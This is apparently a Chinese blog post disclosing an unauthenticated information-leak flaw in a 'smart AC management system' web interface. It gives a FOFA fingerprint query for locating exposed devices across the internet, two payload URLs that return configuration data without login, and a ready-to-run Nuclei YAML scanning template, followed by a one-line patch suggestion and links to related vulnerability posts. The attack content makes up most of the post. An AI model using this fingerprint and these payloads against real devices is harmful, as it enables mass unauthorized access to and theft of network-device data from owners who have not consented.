智能AC管理系统信息泄露漏洞

文章目录

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

智能AC管理系统是一个控制管理系统因存在未授权访问导致信息泄露

搜索语法

fofa

复制代码
header="HTTPD_ac 1.0" 

漏洞复现

payload

复制代码
http://ip/actpt.data

payload

复制代码
http://ip/actpt_5g.data

yaml

yaml 复制代码
id: intelligent-AC-Manage-system-Information-breaches

info: 
 name: 智能AC管理系统信息泄露漏洞
 author: xl
 description: information breaches
 severity: high

http: 
  - raw: 
      - |+
         GET /actpt.data HTTP/1.1
         Host: {{Hostname}} 
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
  - raw: 
      - |+
         GET /actpt_5g.data HTTP/1.1
         Host: {{Hostname}} 
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36

matchers-condition: and
matchers: 
  - type: word
    part: body
    words: 
      - 'ap_name'
  - type: status
    status:
      - 200

修复建议

更新到最新版本

相关推荐
网络研究院7 天前
Citrix 零日漏洞自五月起遭积极利用
网络·安全·漏洞·威胁
网络研究院15 天前
新的 SHAMOS MacOS 窃取程序利用单行终端命令攻击用户
macos·攻击·漏洞·用户
IT 青年19 天前
CVE-2014-6271(bash破壳漏洞 )
漏洞
网络研究院20 天前
新的“MadeYouReset”方法利用 HTTP/2 进行隐秘的 DoS 攻击
网络·网络协议·安全·http·攻击·漏洞
IT 青年1 个月前
CVE-2020-24557
漏洞
第十六年盛夏.1 个月前
【网络安全】不安全的反序列化漏洞
网络安全·漏洞
IT 青年1 个月前
CVE-2021-21148
漏洞
远方2352 个月前
Android无需授权直接访问Android/data目录漏洞
android·安全·文件·漏洞·目录·权限
浮江雾2 个月前
XXE漏洞1-XXE 漏洞简介-XML 语法-DTD 讲解-外部实体讲解
xml·安全·web安全·漏洞·xxe
IT 青年2 个月前
Windows 用户账户控制(UAC)绕过漏洞
漏洞